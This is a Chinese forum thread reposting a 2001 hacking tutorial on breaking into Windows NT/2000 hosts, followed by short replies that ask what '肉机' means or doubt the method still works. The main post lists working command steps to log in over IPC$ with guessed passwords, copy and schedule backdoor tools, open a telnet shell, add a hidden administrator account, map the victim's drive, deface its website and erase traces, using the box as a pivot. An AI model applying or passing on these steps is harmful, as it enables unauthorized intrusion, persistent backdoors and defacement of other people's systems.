找回密码
 注册
搜索
系统gho:最纯净好用系统下载站投放广告、加入VIP会员,请联系 微信:wuyouceo
查看: 1419|回复: 9

简单入侵NT主机

[复制链接]
发表于 2001-7-7 16:00:53 | 显示全部楼层 |阅读模式
简单入侵NT主机
我先说一说入侵的过程,入侵用到的工具只是流光2001,系统是WIN2000。
1、先找台肉机,用流光进行NT/98扫描,对扫到的主机进行IPC登录,即使是简单测试,都可以试出很多主机的用户和密码。(OK,现在找到一个用户名与密码相同的肉机,当然是要有admin权限的用户了)
2、回到系统,在“命令提示符”下,IPC登录:
net use \\ip\ipc$ "password" /user:username
把流光TOOLS目录中的SRV.EXE 与 NTLM.EXE拷贝到肉机
copy srv.exe \\ip\admin$\system32
copy ntlm.exe \\ip\admin$\system32
net time \\ip #查看肉机当前时间
at \\ip time srv.exe #用AT命令执行SRV.EXE,这里的时间要比查看的时间晚两分钟左右,可以用AT \\IP 来查看指定执行命令的状况
等几分钟,命令执行完成,telnet xxx.xxx.xxx.xxx 99 登录成功。要做如下事:
c:\net user newboys 12345 /add #添加名叫newboys的用户,密码为12345
c:\net localgroup administrators newboys /add #把newboys用户放入管理员组中(成超级用户了^&^)
c:\ntlm #运行刚拷到肉机上的ntlm.exe,其作用是把telnet变为明文传输。(流光2001中是这么说的)
运行完NTLM.EXE 后,用EXIT 断开连接。
回到命令提示符下: 利用TOOLS目录中的NETSVC.EXE中断肉机TELNET服务
netsvc \\ip telnet /stop #关闭指定ip的telnet服务
netsvc \\ip telnet /start #打开指定ip的telnet服务
其实如果指定ip以前未开telnet服务直接打"netsvc \\ip telnet /start"就行了。
现在登录:
telnet \\ip 登录到了肉机,在这种状态下,再利用IPC登录,登录目标主机.(目标机的用户名和密码同样是用流光获得的,当然也是admin权限的用户啦)
net use \\ip\ipc$ "password"/user:username
net use x: \\ip\c$ 将他的c盘映射到本地的X盘,(因为一般默认目录在c盘下面,默认存放网页的路径是
c:\inetpub\wwwroot)
把你事先准备好的网页拷到其web目录中,整个黑网站的过程就此算完成了一大半了。最后是清理战场,把拷到肉机上的东东全删了。exit后黑网站的全过程结束。
小结:以上的文章教了你用黑一个网站(由于网站管理员错误造成的)和如何做一个跳板。以后你可以用
newboys这个账号登陆到那个肉机了(这可是你自己的跳板呀)。请不要拿国内主机进行试验。

妖狐安全网 15safety.com 版权所有 © 2001

所有文章版权属于原作者所有,转载请与原作者联系并注明出处-妖狐安全资讯网


发表于 2004-10-7 21:27:52 | 显示全部楼层

简单入侵NT主机

谁能告诉我,什么叫肉机啊?
回复

使用道具 举报

发表于 2004-10-8 00:40:11 | 显示全部楼层

简单入侵NT主机

看过,能看懂,就是没试过
回复

使用道具 举报

发表于 2004-10-8 10:20:29 | 显示全部楼层

简单入侵NT主机

看了,不错,可以尝试一下,呵呵
回复

使用道具 举报

发表于 2004-10-9 11:42:46 | 显示全部楼层

简单入侵NT主机

能行
很 怀疑啊
再说现在很少人用NT 98 啊
回复

使用道具 举报

发表于 2004-10-10 22:06:33 | 显示全部楼层

简单入侵NT主机

[这个贴子最后由superwuyou在 2004/10/10 10:07pm 第 1 次编辑]

肉机就是对方主机有3389漏洞
可以用这个漏洞进入对方系统,这个漏洞很早就有了,现在几乎很少见到这个漏洞
你用X-SCAN扫描就知道了
:em05:
回复

使用道具 举报

发表于 2004-10-10 22:26:28 | 显示全部楼层

简单入侵NT主机

肉鸡好像是指控制的电脑,比如说你想入侵A电脑(你的主要目标),你用你的直接去可能会被发现,你先入侵B,通过B入侵A,完成后将B上你留下的内容删掉就不容易发现你了.不知对不对.我是这样理解的.
回复

使用道具 举报

发表于 2004-10-10 22:59:35 | 显示全部楼层

简单入侵NT主机

拜托,N年前的帖子不要再转了…………
现在网上那台主机不打补丁的???
回复

使用道具 举报

发表于 2004-10-11 00:02:07 | 显示全部楼层

简单入侵NT主机

它说:
  (OK,现在找到一个用户名与密码相同的肉机,当然是要有admin权限的用户了)
不知道这个密码相同的概率有多少?
回复

使用道具 举报

发表于 2004-10-11 13:12:42 | 显示全部楼层

简单入侵NT主机

这一文,是哪儿抄来的,我觉得很眼熟哟,好象已经很老了,那人---隐大虾:::你贴错地方了,你到黑客基地去说吧,这儿不是你吹的地方,还有你的那些过程你用过没有,我告诉你,一般一在不能成功,除非你在局域网中,还有那些超级菜卵中,可是那些人究竟还有多少呢???
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|捐助支持|无忧启动 ( 闽ICP备05002490号-1|闽公网安备35020302032614号 )

GMT+8, 2026-4-8 19:32

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表